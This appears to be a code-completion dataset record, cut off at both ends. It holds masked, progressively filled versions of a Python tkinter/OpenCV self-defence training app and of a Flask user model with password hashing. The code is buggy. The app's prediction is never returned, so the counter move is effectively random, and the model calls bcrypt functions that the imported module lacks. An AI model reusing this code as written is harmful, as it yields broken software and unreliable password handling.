5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\n<mask token>\nstartButton.pack(side=BOTTOM)\n<mask token>\nroot.mainloop()\ncap.release()\n",
"step-3": "<mask token>\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\nroot = tk.Tk()\nroot.geometry('2000x1100')\nldFrame = Frame(root).pack(side='top')\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side='top')\npilLogo = Image.open('Logo.png')\nlogo = ImageTk.PhotoImage(pilLogo)\ncanvas.create_image(350, 100, image=logo)\ndescriptionText = (\n 'This program trains the user to respond in self defense to common physical threats.'\n )\ndescriptionLabel = tk.Label(ldFrame, justify='center', padx=10, font=(\n 'Courier', 18), wraplength=1900, 
text=descriptionText)\ndescriptionLabel.pack(side='top')\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify='center', font=('Courier', \n 20), text='')\ninstructionText = (\n 'In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.'\n )\ninstructionLabel = tk.Label(centerFrame, justify='center', padx=50, pady=50,\n font=('Courier', 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side='top')\nvidLabel = Label(root)\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side='bottom')\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\n 'Courier', 16))\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\ncycling = True\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Start', fg='green', command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Reset', fg='red', 
command=reset)\nroot.mainloop()\ncap.release()\n",
"step-4": "import tkinter as tk\nfrom tkinter import *\nfrom PIL import ImageTk\nfrom PIL import Image\nimport cv2\nimport numpy as np\nfrom statistics import mode\nimport time\nimport random\nimport predict as ml\n\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == 'parry_R':\n instructionLabel.config(text='RIGHT PARRY')\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'parry_L':\n instructionLabel.config(text='LEFT PARRY')\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'punch_R':\n instructionLabel.config(text='RIGHT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'punch_L':\n instructionLabel.config(text='LEFT PUNCH')\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\n \"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n if predictedCounter == 'weave_R':\n instructionLabel.config(text='RIGHT WEAVE')\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'weave_L':\n instructionLabel.config(text='LEFT WEAVE')\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n if predictedCounter == 'block':\n instructionLabel.config(text='BLOCK')\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\nroot = tk.Tk()\nroot.geometry('2000x1100')\nldFrame = Frame(root).pack(side='top')\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side='top')\npilLogo = Image.open('Logo.png')\nlogo = ImageTk.PhotoImage(pilLogo)\ncanvas.create_image(350, 100, image=logo)\ndescriptionText = (\n 'This program trains the user to respond in self 
defense to common physical threats.'\n )\ndescriptionLabel = tk.Label(ldFrame, justify='center', padx=10, font=(\n 'Courier', 18), wraplength=1900, text=descriptionText)\ndescriptionLabel.pack(side='top')\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify='center', font=('Courier', \n 20), text='')\ninstructionText = (\n 'In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.'\n )\ninstructionLabel = tk.Label(centerFrame, justify='center', padx=50, pady=50,\n font=('Courier', 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side='top')\nvidLabel = Label(root)\n\n\ndef show_frame(milliseconds):\n if milliseconds > 0:\n _, frame = cap.read()\n frame = cv2.flip(frame, 1)\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, milliseconds - 30)\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA)\n img = Image.fromarray(cv2image)\n img = img.convert('RGB')\n img.save('imgFile.jpeg')\n if milliseconds == secondsChosen * 3000:\n return ml.predict('imgFile.jpeg')\n\n\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side='bottom')\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\n 'Courier', 16))\ndifficultyList.insert(1, 'Easy: 6 seconds')\ndifficultyList.insert(2, 'Medium: 3 seconds')\ndifficultyList.insert(3, 'Hard: 1 seconds')\ndifficultyList.pack(side='top')\ncycling = True\n\n\ndef runPrompt():\n startButton.config(text='Next')\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = ['Grab from your right', 'Grab from your left',\n 'Blade attack from the right', 'Blade attack from the left',\n 'Hit from the right', 'Hit from the left']\n counterList = ['parry_R', 'parry_L', 'weave_R', 'weave_L', 'punch_R',\n 'punch_L', 'block']\n difficultyChoice = difficultyList.get(ACTIVE)\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == 'E':\n secondsChosen = 6\n elif difficultyChoice[0] == 'M':\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=('Courier', 25)\n )\n vidLabel.pack()\n predictedCounter = show_frame(secondsChosen * 1000)\n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n root.after(secondsChosen * 1200, calcSuccess, predictedCounter, randAssault\n )\n return 0\n\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text='Start')\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=('Courier', 16))\n descriptionLabel.config(text=descriptionText, font=('Courier', 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Start', fg='green', 
command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=('Courier', \n 16), text='Reset', fg='red', command=reset)\nroot.mainloop()\ncap.release()\n",
"step-5": "#THIS IS PYTHON3\nimport tkinter as tk\nfrom tkinter import *\nfrom PIL import ImageTk\nfrom PIL import Image #to handle non-gif image formats\n\nimport cv2\nimport numpy as np\nfrom statistics import mode\n\nimport time\n\nimport random\n\nimport predict as ml\n\ndef calcSuccess(predictedCounter, randAssault):\n vidLabel.pack_forget()\n if predictedCounter == \"parry_R\":\n instructionLabel.config(text=\"RIGHT PARRY\")\n if randAssault == 4 or randAssault == 2:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"parry_L\":\n instructionLabel.config(text=\"LEFT PARRY\")\n if randAssault == 5 or randAssault == 3:\n descriptionLabel.config(text=\"You've successfully parried!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"punch_R\":\n instructionLabel.config(text=\"RIGHT PUNCH\")\n if randAssault == 0 or randAssault == 1 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n\n if predictedCounter == \"punch_L\":\n instructionLabel.config(text=\"LEFT PUNCH\")\n if randAssault == 0 or randAssault == 1 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully counter attacked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n\n if predictedCounter == \"weave_R\":\n instructionLabel.config(text=\"RIGHT WEAVE\")\n if randAssault == 1 or randAssault == 3 or randAssault == 5:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 4:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 2:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"weave_L\":\n instructionLabel.config(text=\"LEFT WEAVE\")\n if randAssault == 0 or randAssault == 2 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully evaded!\")\n elif randAssault == 5:\n descriptionLabel.config(text=\"You've been hit!\")\n elif randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n else:\n descriptionLabel.config(text=\"You've been grabbed!\")\n\n if predictedCounter == \"block\":\n instructionLabel.config(text=\"BLOCK\")\n if randAssault == 5 or randAssault == 4:\n descriptionLabel.config(text=\"You've successfully blocked!\")\n elif randAssault == 2 or randAssault == 3:\n descriptionLabel.config(text=\"You've been cut!\")\n elif randAssault == 0 or randAssault == 1:\n descriptionLabel.config(text=\"You've been grabbed!\")\n descriptionLabel.pack()\n\n\ncap = cv2.VideoCapture(0)\n\nroot = tk.Tk() #initialize tkinter by making tk rook widget--consists of window with tile bar and decoration provided by window manager. 
Root widget must be made first and can only be one.\nroot.geometry(\"2000x1100\")\n\nldFrame = Frame(root).pack(side=\"top\") #frame to hold logo and description\ncanvas = Canvas(ldFrame, width=700, height=200)\ncanvas.pack(side=\"top\")\n\n#open image with pil image because PhotoImage only takes gif\npilLogo = Image.open(\"Logo.png\")\nlogo = ImageTk.PhotoImage(pilLogo) #makes PhotoImage from pil image\ncanvas.create_image(350, 100, image=logo) #adds PhotoImage to Canvas\n\n#make basic description label from text string on the logo description frame\ndescriptionText = \"\"\"This program trains the user to respond in self defense to common physical threats.\"\"\"\ndescriptionLabel = tk.Label(ldFrame, justify=\"center\", padx=10, font=(\"Courier\", 18), wraplength=1900, text=descriptionText)\ndescriptionLabel.pack(side=\"top\")\n\n#make center frame that will show instructions initially and then have \"assaulter\" prompts and live video\ncenterFrame = Frame(root).pack()\ncountdownLabel = tk.Label(centerFrame, justify=\"center\", font=(\"Courier\", 20), text=\"\") #invisible for now because not packed\ninstructionText = \"\"\"In this training system, you will be prompted with how an aggressor is approaching you. You may select a difficulty for this system by choosing how much time you would like to be allowed to react. Based on your counter attack, the system will tell you if the attacker has been [Narrowly Avoided], [Stunned], or [Subdued] based on the quality of your reaction. Your success rate will be tracked at the bottom of the screen. Press the [Start] button to begin and the [Stop] button to end the session.\"\"\"\ninstructionLabel = tk.Label(centerFrame, justify=\"center\", padx=50, pady=50, font=(\"Courier\", 16), wraplength=1800, text=instructionText)\ninstructionLabel.pack(side=\"top\")\n\n#setup to capture video frames\nvidLabel = Label(root)\ndef show_frame(milliseconds):\n if milliseconds > 0:\n #global predictionArr\n _, frame = cap.read()\n #predictionArr.append(predict.get_prediction(frame, \"ace-connection-236822\", \"ICN2459521650166688930\"))\n frame = cv2.flip(frame, 1) #horizontally flips images so is like reflection\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) #makes normal color\n img = Image.fromarray(cv2image)\n imgtk = ImageTk.PhotoImage(img)\n vidLabel.imgtk = imgtk\n vidLabel.config(image=imgtk)\n root.update()\n root.after(30, show_frame, (milliseconds-30))\n _, frame = cap.read()\n cv2image = cv2.cvtColor(frame, cv2.COLOR_BGR2RGBA) \n img = Image.fromarray(cv2image)\n img = img.convert(\"RGB\")\n img.save(\"imgFile.jpeg\")\n if milliseconds == secondsChosen*3000: \n return ml.predict(\"imgFile.jpeg\")\n\n#make bottom frame that hold buttons\nbuttonFrame = Frame(root)\nbuttonFrame.pack(side=\"bottom\")\ndifficultyList = Listbox(buttonFrame, selectmode=SINGLE, height=3, font=(\"Courier\", 16))\ndifficultyList.insert(1, \"Easy: 6 seconds\")\ndifficultyList.insert(2, \"Medium: 3 seconds\")\ndifficultyList.insert(3, \"Hard: 1 seconds\")\ndifficultyList.pack(side=\"top\")\n\ncycling = True\n\ndef runPrompt():\n startButton.config(text=\"Next\")\n startButton.pack(side=LEFT)\n resetButton.pack(side=RIGHT)\n descriptionLabel.pack_forget()\n assaultList = [\"Grab from your right\", \"Grab from your left\", \"Blade attack from the right\", \"Blade attack from the left\", \"Hit from the right\", \"Hit from the left\"]\n counterList = [\"parry_R\", \"parry_L\", \"weave_R\", \"weave_L\", \"punch_R\", \"punch_L\", \"block\"]\n difficultyChoice = 
(difficultyList.get(ACTIVE))\n global secondsChosen\n secondsChosen = 0\n if difficultyChoice[0] == \"E\":\n secondsChosen = 6\n elif difficultyChoice[0] == \"M\":\n secondsChosen = 3\n else:\n secondsChosen = 1\n print(secondsChosen)\n difficultyList.pack_forget()\n\n randAssault = random.randint(0, 5)\n instructionLabel.config(text=assaultList[randAssault], font=(\"Courier\", 25))\n vidLabel.pack()\n \n predictedCounter = show_frame(secondsChosen*1000)\n \n if predictedCounter not in counterList:\n predictedCounter = counterList[random.randint(0, 6)]\n \n root.after(secondsChosen*1200, calcSuccess, predictedCounter, randAssault)\n\n return 0\n\ndef reset():\n resetButton.pack_forget()\n startButton.config(text=\"Start\")\n startButton.pack(side=BOTTOM)\n instructionLabel.config(text=instructionText, font=(\"Courier\", 16))\n descriptionLabel.config(text=descriptionText, font=(\"Courier\", 18))\n descriptionLabel.pack(side=TOP)\n difficultyList.pack(side=TOP)\n\n\nstartButton = Button(buttonFrame, bd=6, padx=20, pady=20,font=(\"Courier\", 16), text=\"Start\", fg=\"green\", command=runPrompt)\nstartButton.pack(side=BOTTOM)\nresetButton = Button(buttonFrame, bd=6, padx=20, pady=20, font=(\"Courier\", 16), text=\"Reset\", fg=\"red\", command=reset)\n \n\nroot.mainloop()\ncap.release()\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
class Usuario(Configuration.db.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __repr__(self):
return '<Usuario %r>' % self.id
<|reserved_special_token_0|>
def get_code(self):
return self.code
<|reserved_special_token_0|>
def get_senha(self):
return self.senha
<|reserved_special_token_0|>
def set_id(self, id):
self.id = id
<|reserved_special_token_0|>
def set_email(self, email):
self.email = email
<|reserved_special_token_0|>
def set_nome(self, nome):
self.nome = nome
def validate_password(self, senha):
return bcrypt.verify(senha, self.senha)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Usuario(Configuration.db.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __repr__(self):
return '<Usuario %r>' % self.id
def get_id(self):
return self.id
def get_code(self):
return self.code
<|reserved_special_token_0|>
def get_senha(self):
return self.senha
<|reserved_special_token_0|>
def set_id(self, id):
self.id = id
<|reserved_special_token_0|>
def set_email(self, email):
self.email = email
def set_senha(self, senha):
self.senha = bcrypt.encrypt(senha)
def set_nome(self, nome):
self.nome = nome
def validate_password(self, senha):
return bcrypt.verify(senha, self.senha)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Usuario(Configuration.db.Model):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def __repr__(self):
return '<Usuario %r>' % self.id
def get_id(self):
return self.id
def get_code(self):
return self.code
def get_email(self):
return self.email
def get_senha(self):
return self.senha
<|reserved_special_token_0|>
def set_id(self, id):
self.id = id
def set_code(self, code):
self.code = code
def set_email(self, email):
self.email = email
def set_senha(self, senha):
self.senha = bcrypt.encrypt(senha)
def set_nome(self, nome):
self.nome = nome
def validate_password(self, senha):
return bcrypt.verify(senha, self.senha)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Usuario(Configuration.db.Model):
__tablename__ = 'usuario'
id = Configuration.db.Column(Configuration.db.BIGINT, primary_key=True,
autoincrement=True)
code = Configuration.db.Column(Configuration.db.String(80), unique=True,
nullable=False)
email = Configuration.db.Column(Configuration.db.String(120), unique=
True, nullable=True)
senha = Configuration.db.Column(Configuration.db.String(300), nullable=True
)
nome = Configuration.db.Column(Configuration.db.String(100), nullable=True)
def __repr__(self):
return '<Usuario %r>' % self.id
def get_id(self):
return self.id
def get_code(self):
return self.code
def get_email(self):
return self.email
def get_senha(self):
return self.senha
def get_nome(self):
return self.nome
def set_id(self, id):
self.id = id
def set_code(self, code):
self.code = code
def set_email(self, email):
self.email = email
def set_senha(self, senha):
self.senha = bcrypt.encrypt(senha)
def set_nome(self, nome):
self.nome = nome
def validate_password(self, senha):
return bcrypt.verify(senha, self.senha)
<|reserved_special_token_1|>
import bcrypt as bcrypt
from config.configuration import Configuration
class Usuario(Configuration.db.Model):
__tablename__ = "usuario"
id = Configuration.db.Column(Configuration.db.BIGINT, primary_key=True, autoincrement=True)
code = Configuration.db.Column(Configuration.db.String(80), unique=True, nullable=False)
email = Configuration.db.Column(Configuration.db.String(120),unique=True, nullable=True)
senha = Configuration.db.Column(Configuration.db.String(300), nullable=True)
nome = Configuration.db.Column(Configuration.db.String(100), nullable=True)
def __repr__(self):
return '<Usuario %r>' % self.id
def get_id(self):
return self.id
def get_code(self):
return self.code
def get_email(self):
return self.email
def get_senha(self):
return self.senha
def get_nome(self):
return self.nome
def set_id(self,id):
self.id = id
def set_code(self,code):
self.code = code
def set_email(self,email):
self.email = email
def set_senha(self,senha):
self.senha = bcrypt.encrypt(senha)
def set_nome(self, nome):
self.nome = nome
def validate_password(self,senha):
return bcrypt.verify(senha,self.senha)
|
flexible
|
{
"blob_id": "598a0771dd1447034f2db95c67dd0dcf968f43a7",
"index": 8229,
"step-1": "<mask token>\n\n\nclass Usuario(Configuration.db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n <mask token>\n\n def get_code(self):\n return self.code\n <mask token>\n\n def get_senha(self):\n return self.senha\n <mask token>\n\n def set_id(self, id):\n self.id = id\n <mask token>\n\n def set_email(self, email):\n self.email = email\n <mask token>\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self, senha):\n return bcrypt.verify(senha, self.senha)\n",
"step-2": "<mask token>\n\n\nclass Usuario(Configuration.db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n\n def get_id(self):\n return self.id\n\n def get_code(self):\n return self.code\n <mask token>\n\n def get_senha(self):\n return self.senha\n <mask token>\n\n def set_id(self, id):\n self.id = id\n <mask token>\n\n def set_email(self, email):\n self.email = email\n\n def set_senha(self, senha):\n self.senha = bcrypt.encrypt(senha)\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self, senha):\n return bcrypt.verify(senha, self.senha)\n",
"step-3": "<mask token>\n\n\nclass Usuario(Configuration.db.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n\n def get_id(self):\n return self.id\n\n def get_code(self):\n return self.code\n\n def get_email(self):\n return self.email\n\n def get_senha(self):\n return self.senha\n <mask token>\n\n def set_id(self, id):\n self.id = id\n\n def set_code(self, code):\n self.code = code\n\n def set_email(self, email):\n self.email = email\n\n def set_senha(self, senha):\n self.senha = bcrypt.encrypt(senha)\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self, senha):\n return bcrypt.verify(senha, self.senha)\n",
"step-4": "<mask token>\n\n\nclass Usuario(Configuration.db.Model):\n __tablename__ = 'usuario'\n id = Configuration.db.Column(Configuration.db.BIGINT, primary_key=True,\n autoincrement=True)\n code = Configuration.db.Column(Configuration.db.String(80), unique=True,\n nullable=False)\n email = Configuration.db.Column(Configuration.db.String(120), unique=\n True, nullable=True)\n senha = Configuration.db.Column(Configuration.db.String(300), nullable=True\n )\n nome = Configuration.db.Column(Configuration.db.String(100), nullable=True)\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n\n def get_id(self):\n return self.id\n\n def get_code(self):\n return self.code\n\n def get_email(self):\n return self.email\n\n def get_senha(self):\n return self.senha\n\n def get_nome(self):\n return self.nome\n\n def set_id(self, id):\n self.id = id\n\n def set_code(self, code):\n self.code = code\n\n def set_email(self, email):\n self.email = email\n\n def set_senha(self, senha):\n self.senha = bcrypt.encrypt(senha)\n\n def set_nome(self, nome):\n self.nome = nome\n\n def validate_password(self, senha):\n return bcrypt.verify(senha, self.senha)\n",
"step-5": "import bcrypt as bcrypt\n\nfrom config.configuration import Configuration\n\nclass Usuario(Configuration.db.Model):\n\n __tablename__ = \"usuario\"\n\n id = Configuration.db.Column(Configuration.db.BIGINT, primary_key=True, autoincrement=True)\n code = Configuration.db.Column(Configuration.db.String(80), unique=True, nullable=False)\n email = Configuration.db.Column(Configuration.db.String(120),unique=True, nullable=True)\n senha = Configuration.db.Column(Configuration.db.String(300), nullable=True)\n nome = Configuration.db.Column(Configuration.db.String(100), nullable=True)\n\n\n def __repr__(self):\n return '<Usuario %r>' % self.id\n\n def get_id(self):\n return self.id\n\n def get_code(self):\n return self.code\n\n def get_email(self):\n return self.email\n\n def get_senha(self):\n return self.senha\n\n def get_nome(self):\n return self.nome\n\n def set_id(self,id):\n self.id = id\n\n def set_code(self,code):\n self.code = code\n\n def set_email(self,email):\n self.email = email\n\n def set_senha(self,senha):\n self.senha = 